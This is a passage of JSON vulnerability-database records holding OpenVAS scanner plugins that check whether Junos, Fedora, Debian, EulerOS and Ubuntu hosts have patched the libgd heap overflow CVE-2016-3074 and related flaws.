"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Junos OS is prone to a heap overflow vulnerability in libgd which allows\nremote attackers to cause a denial of service or potentially execute arbitrary code.", "modified": "2018-10-26T00:00:00", "published": "2017-08-10T00:00:00", "id": "OPENVAS:1361412562310140289", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140289", "type": "openvas", "title": "Junos libgd Heap Overflow Vulnerabiliy", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_jsa1079.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Junos libgd Heap Overflow Vulnerabiliy\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140289\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-10 11:02:59 +0700 (Thu, 10 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-3074\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Junos libgd Heap Overflow Vulnerabiliy\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"Junos OS is prone to a heap overflow vulnerability in libgd which allows\nremote attackers to cause a denial of service or potentially execute arbitrary code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"libgd is an open-source image library which is bundled with PHP version 4.3\nand above. An integer signedness vulnerability exists in libgd 2.1.1 which may result in a heap overflow when\nprocessing compressed gd2 data.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.1X46, 12.3X48, 15.1X49, 14.2, 15.1, 15.1X53, 16.1, 16.2.\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10798\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.1X46-D65\") < 0) &&\n (revcomp(a: version, b: \"12.1X46\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.1X46-D65\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.3X48-D40\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.3X48-D40\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if ((revcomp(a: version, b: \"14.2R8\") < 0) &&\n (revcomp(a: version, b: \"14.2R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.2R8\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if ((revcomp(a: version, b: \"15.1F7\") < 0) &&\n (revcomp(a: version, b: \"15.1F\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1F7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1R5\") < 0) &&\n (revcomp(a: version, b: \"15.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1R5\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D70\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X49-D70\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X53-D47\") < 0) &&\n (revcomp(a: version, b: \"15.1X53\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X53-D47\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^16\") {\n if ((revcomp(a: version, b: \"16.1R4\") < 0) &&\n (revcomp(a: version, b: \"16.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.1R4\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"16.2R2\") < 0) &&\n (revcomp(a: version, b: \"16.2R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.2R2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-06-08T00:00:00", "id": "OPENVAS:1361412562310808313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808313", "type": "openvas", "title": "Fedora Update for gd FEDORA-2016-7d6cbcadca", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gd FEDORA-2016-7d6cbcadca\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808313\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-08 15:47:30 +0200 (Wed, 08 Jun 2016)\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gd FEDORA-2016-7d6cbcadca\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gd on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-7d6cbcadca\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VLAGPHCHY27SKBHQWKM4YBMQW3ZTOHUY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.1.1~3.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:55:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.", "modified": "2017-07-07T00:00:00", "published": "2016-04-24T00:00:00", "id": "OPENVAS:703556", "href": "http://plugins.openvas.org/nasl.php?oid=703556", "type": "openvas", "title": "Debian Security Advisory DSA 3556-1 (libgd2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3556.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3556-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703556);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-3074\");\n script_name(\"Debian Security Advisory DSA 3556-1 (libgd2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-04-24 00:00:00 +0200 (Sun, 24 Apr 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3556.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libgd2 on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.1.1-4.1.\n\nWe recommend that you upgrade your libgd2 packages.\");\n script_tag(name: \"summary\", value: \"Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libgd-dbg:amd64\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd-dbg:i386\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libgd-dev:amd64\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd-dev:i386\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm-dev\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.0-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310807994", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807994", "type": "openvas", "title": "Fedora Update for gd FEDORA-2016-0", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gd FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807994\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:18:34 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gd FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gd on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-May/183724.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.1.1~7.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-05-06T00:00:00", "id": "OPENVAS:1361412562310807957", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807957", "type": "openvas", "title": "Fedora Update for gd FEDORA-2016-5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gd FEDORA-2016-5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807957\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-06 15:29:14 +0530 (Fri, 06 May 2016)\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gd FEDORA-2016-5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gd on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183263.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.1.1~5.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9933", "CVE-2016-6161", "CVE-2016-3074", "CVE-2017-6362"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192583", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for gd (EulerOS-SA-2019-2583)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2583\");\n script_version(\"2020-01-23T13:07:27+0000\");\n script_cve_id(\"CVE-2016-3074\", \"CVE-2016-6161\", \"CVE-2016-9933\", \"CVE-2017-6362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:07:27 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:07:27 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for gd (EulerOS-SA-2019-2583)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2583\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2583\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'gd' package(s) announced via the EulerOS-SA-2019-2583 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based buffer overflow.(CVE-2016-3074)\n\nThe output function in gd_gif_out.c in the GD Graphics Library (aka libgd) allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted image.(CVE-2016-6161)\n\nStack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.(CVE-2016-9933)\n\nDouble free vulnerability in the gdImagePngPtr function in libgd2 before 2.2.5 allows remote attackers to cause a denial of service via vectors related to a palette with no colors.(CVE-2017-6362)\");\n\n script_tag(name:\"affected\", value:\"'gd' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.0.35~26.h8\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-01T00:00:00", "id": "OPENVAS:1361412562310842778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842778", "type": "openvas", "title": "Ubuntu Update for libgd2 USN-2987-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for libgd2 USN-2987-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842778\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-01 05:24:20 +0200 (Wed, 01 Jun 2016)\");\n script_cve_id(\"CVE-2014-2497\", \"CVE-2014-9709\", \"CVE-2015-8874\", \"CVE-2015-8877\", \"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for libgd2 USN-2987-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgd2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", 